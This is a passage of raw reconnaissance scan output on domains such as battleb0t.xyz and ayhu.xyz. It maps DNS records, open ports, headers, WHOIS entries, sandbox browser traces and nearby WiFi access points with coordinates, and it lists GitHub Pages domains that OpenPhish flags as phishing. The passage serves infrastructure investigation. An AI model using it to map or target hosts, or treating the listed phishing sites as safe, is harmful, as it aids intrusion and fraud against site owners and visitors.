00000000-00003984]\n "~DF43978725F0AD1A9B.TMP" has type "data"- Location: [%TEMP%\\~DF43978725F0AD1A9B.TMP]- [targetUID: 00000000-00003844]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._E36934C7-825A-11ED-BF59-080027782352_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF0DA2B49B9610E864.TMP" has type "data"- Location: [%TEMP%\\~DF0DA2B49B9610E864.TMP]- [targetUID: 00000000-00003844]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_1FE77DAC-825D-11ED-BF59-080027782352_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab1F15.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1F15.tmp]- [targetUID: 00000000-00003984]\n "Tar1F16.tmp" has type "data"- Location: [%TEMP%\\Tar1F16.tmp]- [targetUID: 00000000-00003984]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003844]\n "Tar1EA6.tmp" has type "data"- Location: [%TEMP%\\Tar1EA6.tmp]- [targetUID: 00000000-00003984]\n "manifest_1_.webmanifest" has type "JSON data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003984]\n "~DFF051838F7FD5BBCA.TMP" has type "data"- Location: [%TEMP%\\~DFF051838F7FD5BBCA.TMP]- [targetUID: 00000000-00003844]\n "8G5IMZ7J.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\8G5IMZ7J.txt]- [targetUID: 00000000-00003844]\n "~DF0DFB95FF6079C014.TMP" has type "data"- Location: [%TEMP%\\~DF0DFB95FF6079C014.TMP]- [targetUID: 00000000-00003844]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "SKIYYQQ6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SKIYYQQ6.txt]- [targetUID: 00000000-00003844]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://mu-ldn.com/manifest.webmanifest"\n Pattern match: "https://mu-ldn.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive"\n "84x384"\n"type":"image/png"}\n{"src":"icons/icon-512x512.png?v=b44b0926b149aa4cd85edcd506979c33"\n"sizes":"512x512"\n"type":"image/png"}]}", "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public\n max-age=0\n must-revalidate\nContent-Length: 962\nContent-Type: application/octet-stream\nDate: Fri\n 23 Dec 2022 01:35:59 GMT\nEtag: "33b3e5c95c7e0830ca5bead07af4cfd0-ssl"\nServer: 
Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GMY9YV97T1TAAQKCFFGSK6XR\n\n{"name":"gatsby-starter-default"\n"short_name":"starter"\n"start_url":"/"\n"background_color":"#663399"\n"display":"minimal-ui"\n"icons":[{"src":"icons/icon-48x48.png?v=b44b0926b149aa4cd85edcd506979c33"\n"sizes":"48x48"\n"type":"image/png"}\n{"src":"icons/icon-72x72.png?v=b44b0926b149aa4cd85edcd506979c33"\n"sizes":"72x72 | 104.196.30.220 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | flinck (Net ID: 00:01:24:F1:89:80) | 52.3759, 4.8975 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007jedgar.github.io]
https://www.openphish.com/feed.txt | 007jedgar.github.io |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 224.30.196.104.bc.googleusercontent.com | 104.196.30.224 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["163"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Keep_Alive": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Last_Modified": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Keep_Alive": ["timeout=5, max=100"], "Server": ["LiteSpeed"], "Connection": ["Keep-Alive"], "Last_Modified": ["Wed, 17 Jun 2020 20:01:33 GMT"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"], "Accept_Ranges": ["bytes"]} | 87.248.157.102 |
| 2023-05-12 03:03:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0065paula.github.io |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/master058_1.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:34:29 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 45.131.109.62 | 45.131.109.53 |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [etherum-libs.github.io]
https://www.openphish.com/feed.txt | etherum-libs.github.io |
| 2023-05-12 02:54:27 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2489:8202::c8:80 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:44:09 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 1 | 0 | None | battleb0t.xyz:443 | battleb0t.xyz |
| 2023-05-12 02:44:05 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | Cloudflare Inc. Cloudflare | ayhu.xyz |
| 2023-05-12 02:44:21 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nuke.battleb0t.xyz | CN=nuke.battleb0t.xyz |
| 2023-05-12 02:45:36 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz. 300 IN CNAME frabjous-lebkuchen-324004.netlify.app. | funny.battleb0t.xyz |
| 2023-05-12 02:49:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://jonwhitestudio.com/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "KERNEL32" at base 54ab0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base 51b20000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base 51b20000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base 51b20000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\IMM32.DLL" at base 55510000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 51b20000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 51b20000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 51b20000\n "msedge.exe" loaded module "%WINDIR%\\TEMP\\VXOLE64.DLL" at base 44ff0000\n "msedge.exe" loaded module "NTMARTA.DLL" at base 50ad0000\n "msedge.exe" loaded module "KERNEL32.DLL" at base 54ab0000\n "msedge.exe" loaded module "COMBASE.DLL" at base 54f70000\n "msedge.exe" loaded module "OLE32.DLL" at base 547e0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 4ffd0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, 
oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3236:120:WilError_01"\n "Local\\SM0:2928:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:2928:120:WilError_01"\n "Local\\SM0:3236:304:WilStaging_02"\n "SM0:3236:120:WilError_01"\n "SM0:3236:304:WilStaging_02"\n "Local\\SM0:3236:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3236:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3236:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3236:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cloud.typenetwork.com"\n "jonwhitestudio.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "142.250.191.40:443"\n "151.101.1.91:443"\n "142.250.189.238:443"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': 
u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsjonwhitestudio.com" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00003236]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003236]\n "f_00023e" has type "Web Open Font Format (Version 2) CFF length 42632 version 2.0"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00005628]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003236]\n "71b8d211-731c-4c7b-833c-eb5281c135d2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\71b8d211-731c-4c7b-833c-eb5281c135d2.tmp]- [targetUID: 00000000-00003236]\n "f_000243" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] baseline precision 8 3090x1512 components 3"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00005628]\n "manifest.json" has type "JSON data"- Location: [%TEMP%\\3236_351054471\\manifest.json]- [targetUID: 00000000-00003236]\n "f_00023d" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] baseline precision 8 1000x489 components 3"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00005628]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\OriginTrials\\0.0.1.4\\manifest.fingerprint]- [targetUID: 00000000-00003236]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.4\\edge_autofill_field_data.json]- [targetUID: 00000000-00003236]\n "49bd05701c59769f_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\49bd05701c59769f_0]- [targetUID: 00000000-00003236]\n "16973868-0a70-4008-a528-95f61f45524c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\16973868-0a70-4008-a528-95f61f45524c.tmp]- [targetUID: 00000000-00003236]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00004972]\n "e0680e1b-98b7-4c75-9bb0-40225dedbc07.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e0680e1b-98b7-4c75-9bb0-40225dedbc07.tmp]- [targetUID: 00000000-00003236]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003236]\n "b4ff48f4-20ee-483b-a145-b93992192217.tmp" has type "ASCII text with no line terminators"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\b4ff48f4-20ee-483b-a145-b93992192217.tmp]- [targetUID: 00000000-00003236]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\3236_1474835879\\adblock_snippet.js]- [targetUID: 00000000-00003236]\n "52c697f3-a2b7-49a3-af0f-66bf07c9173d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\3236_351054471\\deny_domains.list]- [targetUID: 00000000-00003236]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://jonwhitestudio.com/"\n Pattern match: "https://jonwhitestudio.com"\n Heuristic match: "cloud.typenetwork.com"\n Heuristic match: "jonwhitestudio.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/93 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.43" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.43"'}], u'threat_level': 0, u'size': None, u'job_id': u'6404e67292fd2ef63a0cf584', u'target_url': 
None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'suspicious_identifiers': [], u'attck_id': u'T1129', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Shared Modules', u'informative_identifiers': [], u'tactic': u'Execution', u'informative | 185.199.110.153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:57:25 | Co-Hosted Site | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | funny-face-pictures.nom-nom.link | battleb0t.xyz |
| 2023-05-12 02:54:23 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 403 | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU |
| 2023-05-12 03:09:59 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | stage-sdb-n1-fra1.amcodev.me | 165.232.113.89 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:55:E9:E6) | 52.3759, 4.8975 |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | United States | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
| 2023-05-12 02:57:21 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'35.229.48.116'], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://www.transferxl.com/download/00jJFzX0NZqb7p?utm_source=downloadmail&utm_medium=e-mail', u'signatures': [{u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 2324 -s 132" (UID: 00000000-00002912)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2808"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_af8_IE_EarlyTabStart_0x9fc_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_af8_ConnHashTable<2808>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_af8_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_af8_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "DBWinMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_af8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00002912) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', 